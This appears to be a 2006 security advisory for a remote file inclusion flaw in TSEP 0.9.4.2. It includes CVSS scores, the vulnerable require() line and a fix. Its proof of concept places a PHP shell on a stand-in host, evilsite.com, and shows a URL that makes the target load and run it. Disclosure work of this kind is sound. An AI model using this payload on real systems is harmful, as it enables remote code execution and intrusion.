TSEP 0.9.4.2 <= Remote File Inclusion

2006.08.08
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+-------------------------------------------------------------------- + + TSEP 0.9.4.2 + +-------------------------------------------------------------------- + + Affected Software .: TSEP 0.9.4.2 + Venedor ...........: http://www.tsep.info/ + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: Philipp Niedziela + Original advisory .: http://www.bb-pcsecurity.de/ + Contact ...........: webmaster[at]bb-pcsecurity[.]de + +-------------------------------------------------------------------- + + Code /include/copyright.php: + + ..... + <?php require ( $tsep_config["absPath"]."/include/tsepversion.txt" ); ?> + ..... + +-------------------------------------------------------------------- + + $tsep_config["absPath"] is not properly sanitized before being used + +-------------------------------------------------------------------- + + Solution: + Include config-File in copyright.php + +-------------------------------------------------------------------- + + PoC: + Place a PHPShell on a remote location: + http://evilsite.com/include/tsepversion.txt + + http://[target]/include/copyright.php?tsep_config[absPath]=http://evilsi te.com?cmd=ls + +-------------------------------------------------------------------- + + Greets: + Krini Gonzales (5 YEARS :P) + +-------------------------[ E O F ]----------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top